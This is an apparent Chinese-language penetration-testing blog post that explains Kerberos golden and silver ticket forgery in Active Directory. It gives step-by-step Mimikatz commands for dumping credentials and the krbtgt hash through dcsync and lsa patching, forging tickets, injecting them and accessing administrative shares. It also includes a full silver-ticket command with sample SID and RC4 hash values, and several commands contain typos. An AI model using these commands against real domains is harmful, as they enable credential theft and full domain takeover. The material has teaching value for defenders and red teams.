「Active Directory Sec」白银票据和黄金票据
in PENETRATIONDomain-Sec with 0 comment

「Active Directory Sec」白银票据和黄金票据

in PENETRATIONDomain-Sec with 0 comment

描述


白银票据: 即伪造的TGS。当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器。此过程不需要KDC的参与。但缺点是只能访问一个服务。

黄金票据: 即伪造TGT。当攻击者拥有普通域账户,krbtgt NTLM hash ,域SID时,就可以伪造TGT。拥有黄金票据就拥有了域内所有的访问控制权限。

原理


黄金票据

goden1.jpg

通过Kerberos的通信过程就可以看出,当攻击者获取krbtgtHASH值时,就可以利用这个HASH去伪造TGT,票据授予票据,在以后每一次的通信过程中,Client就能利用这个伪造的TGT去获取要访问的ServerTGS。也就是说,伪造了黄金票据,就拥有了域内所有的访问控制权限。

黄金票据的条件

  1. 域名称
  2. 域的SID
  3. 域的krbtgt账户NTLM HASH
  4. 伪造用户名

局限

在一个多域AD森林中,如果创建的黄金票据不包含在Enterprise Admin组中,则黄金票据不会向森林中的其他域提供管理权限。在单个域中,由于Enterprise Admin组驻留在此域中,这时黄金票据不存在局限性。

Mimikatz伪造黄金票据、

1.获取winodws域名称

$ systeminfo

2.获取krbtgt和账户信息

mimikatz# sekurlsa::kerberos
mimikatz# sekurlsa::ticket /export
mimikatz# sekurlsa::logonpassword
mimikatz# lsadump::dsync /domain:xxx.xxx.xxx /user:krbtgt
mimikatz# lsadump::lsa /patch -> sid+ntlm

3.生成黄金票据

# 使用krbtgt的hash值:
mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi

# 使用krbtgt的aes256值:
mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi

goden.jpg

4.使用黄金票据

#  导入票据
mimikatz::ptt test.kribi
#检验缓存票据
PS C:\Users\Administrastor> klist  
#利用票据访问
PS C:\Users\Administrastor> net use \\xx.domain-name
dir \\xx.domain-name\c$

goden3.jpg

goden4.jpg

利用dcsync获取hash
从域控制器获取user01hash

goden5.jpg

白银票据

goden8.jpg

kerberos通信协议来看,在KDCClient发送TGS时,利用了远程服务器ServerKDC共享的长期秘钥来加密的。也就是说,只要获取了远程服务器ServerNTLM HASH就可以伪造票据。前提是利用其他方式获取需要访问服务器的NTLM HASH

特点

  1. 不需要与KDC进行交互
  2. 需要目标服务的NTLM HASH

Mimikatz 白银票据伪造:

* kerberos::list #列出票据
* kerberos::purge # 清除票据

goden6.jpg

白银票据的伪造:

mimikatz “kerberos::golden /user:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit

goden7.jpg

总结

kerberos认证中,KDCClientServer的共同信任第三方,而建立信任的过程中“票据”是信任关系的凭据。但这张凭据的最终生成核心秘钥还是NTLM HASH,获取NTLM HASH之后,就可以伪造票据,达到欺骗的效果。也可以认为是域内的权限提升。

Responses